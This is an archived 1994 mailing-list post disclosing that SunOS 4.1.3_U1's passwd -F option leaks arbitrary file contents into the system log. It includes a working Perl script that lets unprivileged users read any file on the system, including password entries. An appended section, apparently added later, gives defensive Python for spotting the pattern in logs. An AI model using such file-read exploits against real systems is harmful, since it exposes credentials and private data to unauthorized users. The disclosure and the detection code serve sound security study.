passwd -F

Steve Mitchell (steve@cati.csufresno.edu)
Tue, 10 May 94 17:19:53 PDT

FYI, this vulnerability exists on 4.1.3_U1.  I do not know how
widespread knowledge of this vulnerability is, but I have seen Suns
running a modified passwd program that has "-F option disabled" (according
to the message output by passwd).  So somebody out there has known about
it for a while.

The following trivial perl script allows non-privileged users to 
easily read any file on the system.

--steve

-- 
Steve Mitchell      KD6BET       TIP#168       steve_mitchell@csufresno.edu
"STUFF: Anything that can be used for homebrewing."  "JUNK: Everything else
you thought could be used for homebrewing, but can't."    --Steve Casselman


#!/usr/local/bin/perl
#
# Author disclaims all responsibility for misuse of this script
#  --sjm 5/10/94

$file = shift || die "Usage: $0 filename\n";

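# Open the system log before running passwd so the current end of the
# file can be recorded.
open(A,"</var/adm/messages") || die "Cannot open /var/adm/messages: $!\n";

# $statf[7] is the size of the log in bytes at this point.
@statf = stat(A);

system("/usr/bin/passwd -F $file 1>&2 2>/dev/null");

# Skip everything that was already in the log.
seek(A,$statf[7],0);

# Print the text after the first double quote of each new passwd entry.
while(<A>) {
	next if !/passwd/;
	($stuff,$line) = split(/"/,$_,2);
	print $line;
}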
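
A defender's view of the same log channel, as an added example that is not part of the original post: the Python below flags syslog entries where one passwd process echoed several quoted lines, and checks whether the log file is readable by "other", which is what the script above depends on. The log layout, the placeholder message text, the sample lines and all function names are assumptions; the post only shows that the entries contain "passwd" and a double quote.

```python
import os
import re
import stat

# Constructed sample in a generic BSD syslog layout (assumption). The text
# before the quote is a placeholder; the post only shows that entries contain
# "passwd" and a double quote followed by the echoed line.
SAMPLE_LOG = '''\
May 10 17:01:12 hostA su: 'su root' succeeded for alice on /dev/ttyp1
May 10 17:19:50 hostA passwd[412]: <placeholder text> "root:EXAMPLEHASH0:0:1:Operator:/:/bin/csh"
May 10 17:19:50 hostA passwd[412]: <placeholder text> "daemon:*:1:1::/:"
May 10 17:19:50 hostA passwd[412]: <placeholder text> "# constructed comment line"
May 10 17:25:03 hostA sendmail[500]: AA00500: to=bob, stat=Sent
'''

# timestamp, host, optional pid, then everything after the first double quote
ENTRY = re.compile(r'^(\w{3}\s+\d+ [\d:]{8}) (\S+) passwd(?:\[(\d+)\])?: [^"]*"(.*)$')

def find_echoed_lines(log_text):
    """Group passwd entries that carry quoted text by (host, pid)."""
    groups = {}
    for line in log_text.splitlines():
        m = ENTRY.match(line)
        if m:
            when, host, pid, payload = m.groups()
            groups.setdefault((host, pid), []).append((when, payload.rstrip('"')))
    return groups

def suspicious_runs(log_text, threshold=2):
    """One passwd process echoing several lines suggests a file was fed to -F."""
    hits = find_echoed_lines(log_text)
    return {key: rows for key, rows in hits.items() if len(rows) >= threshold}

def world_readable(path):
    """True if 'other' has read permission on the log file."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)
```

Run `suspicious_runs` over the contents of the real log and `world_readable` on its path; the threshold of 2 is an arbitrary starting point.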